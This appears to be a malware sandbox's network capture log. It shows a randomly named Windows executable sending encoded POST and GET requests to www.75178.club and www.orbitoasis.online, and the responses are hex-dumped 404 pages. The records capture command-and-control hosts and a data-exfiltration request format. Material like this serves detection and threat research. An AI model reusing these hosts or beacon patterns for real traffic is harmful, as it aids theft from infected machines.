                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Origin: http://www.75178.club
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.75178.club/a4h7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 31 61 39 53 49 69 43 47 2b 30 42 44 4e 6e 6d 56 79 32 72 33 70 69 58 7a 53 2f 4c 6c 45 55 70 57 37 47 38 54 42 59 59 4c 72 32 53 51 2f 35 70 4e 59 7a 4e 64 65 63 68 53 46 36 33 43 6e 38 47 34 53 61 48 64 59 50 44 64 41 58 42 59 65 79 6a 57 32 34 36 79 72 36 77 67 32 31 61 45 6c 66 39 50 4c 63 4c 45 4d 67 37 56 38 6f 74 7a 37 52 42 4c 74 76 34 58 49 2b 6a 34 4a 38 2b 34 31 57 41 78 57 4c 66 30 5a 74 72 54 30 4e 6c 75 50 4b 68 41 74 56 31 38 51 30 75 76 42 6b 77 37 62 75 65 51 32 57 38 65 45 77 46 70 68 64 4d 6e 4f 52 55 36 6d 73 5a 6b 4b 6e 56 47 30 6f 71 2f 45 45 53 38 64 44 65 77 39 55 66 36 50 55 50 2b 42 33 6f 6f 64 4a 4f 39 50 39 6f 44 4c 55 74 72 70 49 6b 6b 44 79 67 2b 39 4b 4f 50 65 6d 38 55 54 4a 5a 62 78 53 4a 36 57 70 31 54 39 4a 58 5a 47 42 71 46 78 4f 77 48 51 63 4b 58 47 72 6a 68 52 31 68 79 4a 50 64 46 68 33 78 4d 59 64 49 73 6b 36 75 31 5a 6e 44 54 79 45 39 2f 4d 63 64 32 4d 71 4e 37 54 48 79 61 7a 4f 46 51 62 69 69 4b 72 73 6c 4b 35 [TRUNCATED]
Data Ascii: prh4= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49979 | 23.167.152.41 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 09:23:20.397167921 CET | 491 | OUT | GET /a4h7/?prh4=PP6GFaOQILwxi5dhMSrYmidfGUiluWiM7xDYUPH7LXca8g8uO5tY4GvA0apkUDdsINAyEZvfq9K0A+PIYqHQIltxcg2u/Ln1i4sz2BSy8/lHA9faVw==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49981 | 66.29.132.194 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 09:23:25.835645914 CET | 762 | OUT | POST /k6yn/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Origin: http://www.orbitoasis.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.orbitoasis.online/k6yn/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 67 50 42 36 32 5a 47 32 79 50 65 30 50 6d 62 50 61 63 6c 65 76 75 48 76 45 39 4e 61 4c 32 51 6c 49 53 38 74 31 48 76 4b 75 31 68 76 34 78 67 47 6f 42 64 61 4a 35 67 59 4f 34 58 56 46 69 41 47 57 73 76 6d 36 51 67 68 59 73 4d 4a 31 65 74 30 50 4b 4a 69 30 41 61 49 35 35 6f 66 69 50 34 50 66 4b 75 57 69 37 56 4e 67 47 46 59 31 39 6a 73 6e 4f 41 67 7a 47 72 33 38 6b 59 54 6f 42 6b 5a 69 72 5a 6a 30 4a 6d 46 32 6c 46 34 34 59 62 74 6c 32 52 46 6b 67 4d 32 44 48 48 6c 66 4a 42 58 39 41 69 43 30 68 67 4c 2b 65 36 51 4d 67 71 55 71 4c 76 33 34 63 71 73 4e 61 68 52
                                                                      Data Ascii: prh4=gPB62ZG2yPe0PmbPaclevuHvE9NaL2QlIS8t1HvKu1hv4xgGoBdaJ5gYO4XVFiAGWsvm6QghYsMJ1et0PKJi0AaI55ofiP4PfKuWi7VNgGFY19jsnOAgzGr38kYToBkZirZj0JmF2lF44Ybtl2RFkgM2DHHlfJBX9AiC0hgL+e6QMgqUqLv34cqsNahR
Nov 20, 2024 09:23:26.444169998 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Wed, 20 Nov 2024 08:23:26 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 2b f3 cb cc ea cc fa ed b7 df 1e ff 89 5d 32 6b 43 e1 06 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 4d e7 db 6f 97 9f 89 5b 99 60 46 95 df bb c7 3a 6c 9e ee 98 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 16 a5 5b 3d d5 95 77 4f de 7d 4a c7 b4 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 2a 85 e9 27 e6 3f b2 82 eb f2 b0 70 cb ab 25 c8 3b ea a9 99 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 66 7c 5f da 66 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 90 b3 6a 30 cd ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 b6 32 e7 34 f8 fb 65 6a ff d9 37 0f 48 e7 de 33 93 30 3e 3d 0c a8 02 6c fb 65 20 b8 71 e3 56 a1 6d 7e 19 94 66 5a de 97 6e 11 7a 7f f9 71 59 19 9e dd 87 01 4a e4 dd [TRUNCATED]
                                                                      Data Ascii: 1359ZrHr?OAa{7j$A$@$Hn85d.PRbKpD#++]2kCA~{|31pMo[`F:l,N{7*_v`[=wO}J__d4O*'?p%;OwMyVTW'mB||iXf|_f>_*v1j0y;EYVr{]/|24ej7H30>=le qVm~fZnzqYJ8L_QevxwiaSc8a?n]~gt*/Y7p2M +`=L ]Hf/;E5vy}zA_\Whqo_P!.\c=$?Sg\_kw7Bkt7r=W3_w&8EPM/mI7d#8''@[YUe$zu;fp)n;J#<YWzuLsk9L`bsb|0|^%OAVWeB~Wnwx]7lyqWp>Pnn6F.|XoPG+Sr>2hF"?f'KA{dK71>j#W{}>Lnn!AOh^:?8W
Nov 20, 2024 09:23:26.444343090 CET | 224 | IN | Data Raw: 73 c6 a7 04 4a e0 6f 6a 78 e3 e7 6f 89 eb 84 e6 e0 4f 09 70 a4 2f 8a 19 8f c8 bc fb f3 cd 36 b7 a8 bd 19 ee 85 97 67 e5 25 42 3d 0c 0a 37 06 be ae b9 31 c0 7e 4e ef b1 80 fd b4 0f 83 20 74 1c 37 7d 63 a9 1f ed db 55 7c ba 20 fb d9 ae df cf 7b 63
                                                                      Data Ascii: sJojxoOp/6g%B=71~N t7}cU| {c_qQ*~7/KQOEJ{_+-5j_. _W*C@HCY~U!3gHbO5*z~qV
Nov 20, 2024 09:23:26.444375038 CET | 1236 | IN | Data Raw: 75 f5 81 71 bd 5c c6 af fc 47 bf b2 6f af d7 9b 0f 86 5e 8f 84 dc dc d3 fb 65 37 c2 79 b9 70 3f 6b ff 03 00 dd c4 eb cf 14 ff 46 f5 03 e7 33 99 00 d1 fe 2f 9c cf 8f 6e a3 2e e2 3f 39 66 65 3e 5c dc 08 9c a7 fe 5f 2c b3 74 47 c4 97 70 43 2f b5 16
                                                                      Data Ascii: uq\Go^e7yp?kF3/n.?9fe>\_,tGpC/~F&}K?#CI/St{*6!?co5CuZ@.*P:}[dlR($};Lk! }q%fN~6_eAjxYPwgRgqSj|Ij3Hy
Nov 20, 2024 09:23:26.444842100 CET | 1236 | IN | Data Raw: 0d ae ad 8f 43 82 0a 14 b7 c3 65 53 54 17 ad 20 8a 6a ac 46 8a d5 96 da 34 77 12 c7 82 03 96 5c af 58 a6 5d d3 35 b9 c5 91 72 25 86 ab 31 40 4c bb 1f 33 3e e5 b2 87 d8 94 26 51 45 b1 08 24 75 2d 48 4e 93 bb 72 6d 4a 99 26 66 8c b9 4f 7c 9c 56 fd
                                                                      Data Ascii: CeST jF4w\X]5r%1@L3>&QE$u-HNrmJ&fO|V6]`A1U<5gO;"J><C&'6pAn%*h*!!.c@CYjH%:^,RZ3W-z\A=H6*A2Bu_YJp;mVXr$5Tu,b}
Nov 20, 2024 09:23:26.444876909 CET | 1236 | IN | Data Raw: 28 6c 78 b1 9d 55 8b d3 b8 96 47 8a 0b b7 54 5a d0 dd 32 a5 cc 93 b8 5a 6c 23 95 6c 33 7a 7e d2 20 c8 d1 d7 65 cd cd a1 05 99 63 34 4b 78 bc 53 7a c7 a0 e3 d5 b5 ba 8f 6b 41 5f ec 0a ad 04 97 2b 9a 43 96 fe 59 8c 0b 53 23 9b a8 1d 1d d3 5d 52 b3
                                                                      Data Ascii: (lxUGTZ2Zl#l3z~ ec4KxSzkA_+CYS#]R)+ ;$3Z3q-4j<ybh("0=ai-C]":dnYvMmn5f<oW7A '@ZU"kIQXV;;,K|,wC
Nov 20, 2024 09:23:26.444910049 CET | 62 | IN | Data Raw: cc f7 fa e2 7f ff 17 70 45 e8 68 70 4d ed 03 95 3d ab cd bc 51 c8 7b 7c 3d c2 d7 5a 7b 84 9f e3 d7 e3 e5 99 dc b7 df fe 07 00 00 ff ff 03 00 24 f7 ec 9b 84 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: pEhpM=Q{|=Z{$'0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49982 | 66.29.132.194 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 09:23:28.387253046 CET | 786 | OUT | POST /k6yn/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Origin: http://www.orbitoasis.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.orbitoasis.online/k6yn/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 78 76 35 51 51 47 76 41 64 61 4f 35 67 59 46 59 58 4d 4c 43 41 37 57 73 79 5a 36 54 34 68 59 74 6f 4a 31 66 64 30 4f 37 4a 39 31 51 61 4b 73 70 6f 64 39 66 34 50 66 4b 75 57 69 37 42 7a 67 43 52 59 31 4f 72 73 6e 73 34 6a 2b 6d 72 77 32 45 59 54 69 52 6b 64 69 72 5a 52 30 4c 53 2f 32 6e 39 34 34 64 6e 74 69 6e 52 47 76 67 4d 73 41 33 47 32 50 62 4d 67 77 67 6d 6c 2b 44 38 49 6a 63 7a 77 4c 42 58 54 37 61 4f 67 72 72 32 69 44 63 55 37 4c 79 42 68 6f 4e 4e 44 6f 4e 2b 4f 34 50 4c 73 69 61 42 2f 48 51 3d 3d
                                                                      Data Ascii: prh4=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvDxv5QQGvAdaO5gYFYXMLCA7WsyZ6T4hYtoJ1fd0O7J91QaKspod9f4PfKuWi7BzgCRY1Orsns4j+mrw2EYTiRkdirZR0LS/2n944dntinRGvgMsA3G2PbMgwgml+D8IjczwLBXT7aOgrr2iDcU7LyBhoNNDoN+O4PLsiaB/HQ==
Nov 20, 2024 09:23:28.977950096 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Wed, 20 Nov 2024 08:23:28 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 31 33 34 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 2b f3 cb cc ea cc fa ed b7 df 1e ff 89 5d 32 6b 43 e1 06 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 4d e7 db 6f 97 9f 89 5b 99 60 46 95 df bb c7 3a 6c 9e ee 98 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 16 a5 5b 3d d5 95 77 4f de 7d 4a c7 b4 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 2a 85 e9 27 e6 3f b2 82 eb f2 b0 70 cb ab 25 c8 3b ea a9 99 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 66 7c 5f da 66 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 90 b3 6a 30 cd ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 b6 32 e7 34 f8 fb 65 6a ff d9 37 0f 48 e7 de 33 93 30 3e 3d 0c a8 02 6c fb 65 20 b8 71 e3 56 a1 6d 7e 19 94 66 5a de 97 6e 11 7a 7f f9 71 59 19 9e dd 87 01 4a e4 dd [TRUNCATED]
                                                                      Data Ascii: 134FZrHr?OAa{7j$A$@$Hn85d.PRbKpD#++]2kCA~{|31pMo[`F:l,N{7*_v`[=wO}J__d4O*'?p%;OwMyVTW'mB||iXf|_f>_*v1j0y;EYVr{]/|24ej7H30>=le qVm~fZnzqYJ8L_QevxwiaSc8a?n]~gt*/Y7p2M +`=L ]Hf/;E5vy}zA_\Whqo_P!.\c=$?Sg\_kw7Bkt7r=W3_w&8EPM/mI7d#8''@[YUe$zu;fp)n;J#<YWzuLsk9L`bsb|0|^%OAVWeB~Wnwx]7lyqWp>Pnn6F.|XoPG+Sr>2hF"?f'KA{dK71>j#W{}>Lnn!AOh^:?8W
Nov 20, 2024 09:23:28.977981091 CET | 1236 | IN | Data Raw: 73 c6 a7 04 4a e0 6f 6a 78 e3 e7 6f 89 eb 84 e6 e0 4f 09 70 a4 2f 8a 19 8f c8 bc fb f3 cd 36 b7 a8 bd 19 ee 85 97 67 e5 25 42 3d 0c 0a 37 06 be ae b9 31 c0 7e 4e ef b1 80 fd b4 0f 83 20 74 1c 37 7d 63 a9 1f ed db 55 7c ba 20 fb d9 ae df cf 7b 63
                                                                      Data Ascii: sJojxoOp/6g%B=71~N t7}cU| {c_qQ*~7/KQOEJ{_+-5j_. _W*C@HCY~U!3gHbO5*z~qVuq\Go^
Nov 20, 2024 09:23:28.977999926 CET | 448 | IN | Data Raw: 3d 13 70 bb 70 59 e2 93 05 2c 1a 6d b8 ec 34 c1 77 b9 b9 9d 58 92 38 b1 6d 41 63 9c 4e 77 0d 33 9d e6 ea 4c a2 75 56 9c 76 2d 6a 07 b3 90 a6 b2 24 3a e3 1d 81 c7 50 5a 6f f9 64 1b 44 6a 89 98 23 63 6c 08 1b 77 3c c6 12 b4 da c7 3a cd 05 73 71 12
                                                                      Data Ascii: =ppY,m4wX8mAcNw3LuVv-j$:PZodDj#clw<:sqzyYq'~u*8tLej-%Pr?Zs-}\q]lZ|t: GfRj#Up,)jf(6r/bRwjE8D^x)psBZ^D^nCeST j
Nov 20, 2024 09:23:28.978677988 CET | 1236 | IN | Data Raw: d6 72 ec 91 d9 86 b3 e6 24 35 1c 8e 54 75 8e 2c e4 62 7d c0 aa 70 eb d9 d3 34 40 02 45 cc 0d 6e c3 1f 12 9a 72 31 6b 32 d4 f1 56 ea c2 2c e4 0a 2d c1 d2 3a 70 48 55 63 28 52 6c d7 1a b5 45 97 63 85 2a ad 8a 51 4e 92 e4 cf 72 08 85 45 b3 3b f2 94
                                                                      Data Ascii: r$5Tu,b}p4@Enr1k2V,-:pHUc(RlEc*QNrE;v.$5QL1rMRNs^-/zxYL9JoZ9]e9:h+8x2sl(dl@V4bLNs_G*.]MyvV1e!9k/M
Nov 20, 2024 09:23:28.978702068 CET | 1079 | IN | Data Raw: 0e a0 e8 87 4b d6 f0 84 ca a2 7c 84 2c 77 0f 02 a6 43 12 a3 e1 b8 55 0c 4f 26 f3 3d 6d 23 3e 34 9b 87 73 23 94 8b 49 41 34 e8 be 68 1c ab 32 cf 39 3a 5a af 98 a5 b7 cf 73 29 e4 d9 51 b8 39 16 d8 18 cd 36 59 a4 8f a8 d9 44 1f 4e f9 74 27 b6 ed 30
                                                                      Data Ascii: K|,wCUO&=m#>4s#IA4h29:Zs)Q96YDNt'0h1}`\0MXMYR# Du!NxMf#\sJa$>Y9kKEEd^GChj8bJtsvj=!a~o:MN1`B5=ez(D3qP6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49983 | 66.29.132.194 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 09:23:30.933165073 CET | 1799 | OUT | POST /k6yn/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Origin: http://www.orbitoasis.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.orbitoasis.online/k6yn/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 35 76 35 6d 6b 47 76 6a 46 61 50 35 67 59 47 59 58 52 4c 43 41 71 57 73 37 51 36 55 77 62 59 76 67 4a 31 38 56 30 48 76 6c 39 37 51 61 4b 7a 5a 6f 51 69 50 34 67 66 4f 79 61 69 37 52 7a 67 43 52 59 31 50 37 73 68 2b 41 6a 74 32 72 33 38 6b 59 58 6f 42 6b 6c 69 71 77 6d 30 4c 57 76 32 57 64 34 34 39 58 74 6a 52 4e 47 7a 77 4d 71 4a 6e 48 78 50 62 41 2f 77 67 36 70 2b 43 49 6d 6a 65 7a 77 4a 6b 2b 50 73 72 4f 58 2b 35 79 74 4e 64 6b 44 46 45 67 47 67 4f 52 41 73 49 2b 77 6b 4c 6a 6e 68 2b 4d 59 66 67 2f 44 47 33 51 68 77 59 68 6f 7a 4f 67 6a 59 6a 75 50 71 56 76 75 69 35 74 7a 4e 34 65 42 4b 33 34 6c 47 32 5a 35 38 55 35 33 53 76 49 35 4c 48 70 53 48 7a 58 4d 73 4c 6d 68 62 47 7a 5a 2b 63 30 74 6f 47 2b 46 52 37 6a 67 52 46 6a 34 52 59 58 75 37 51 33 55 51 33 34 4d 37 70 4e 6d 46 74 6a 41 72 57 67 51 35 44 36 34 57 53 4e 52 43 48 53 73 4b 62 4c 37 79 52 61 35 52 [TRUNCATED]
Data Ascii: prh4= [TRUNCATED]
Nov 20, 2024 09:23:31.531133890 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Wed, 20 Nov 2024 08:23:31 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                                      Data Ascii: 1359ZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
Nov 20, 2024 09:23:31.531155109 CET | 1236 | IN | Data Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                                      Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
Nov 20, 2024 09:23:31.531167030 CET | 448 | IN | Data Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                                      Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
Nov 20, 2024 09:23:31.531411886 CET | 1236 | IN | Data Raw: cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 16 5d 8e 15 aa b4 2a 46 39 49 92 3f cb 21 14 16 cd ee c8 53 da
                                                                      Data Ascii: Gfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$p][YZL'939}ZvS7YE<tz@4Q
Nov 20, 2024 09:23:31.531425953 CET | 1074 | IN | Data Raw: 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 e6 58 60 63 34 db 64 91 3e a2 66 13 7d 38 e5 d3 9d d8 b6 c3 44
                                                                      Data Ascii: .Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(B46;PIIdlbk$Fr6,eCD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49984 | 66.29.132.194 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 09:23:33.481877089 CET | 498 | OUT | GET /k6yn/?_VK8=7pXD8zQxGFxP&prh4=tNpa1p20+8HvGGTGCcJ0ltHXQ7hkDEI9aQgmgnvjgQBap2YCvQVXfu4lL5fLGicbWcSejDEnKeIqzsVAbPYV6QWKx4B669tBZ47n68xm5CBB0u297w== HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Nov 20, 2024 09:23:34.156001091 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      date: Wed, 20 Nov 2024 08:23:34 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
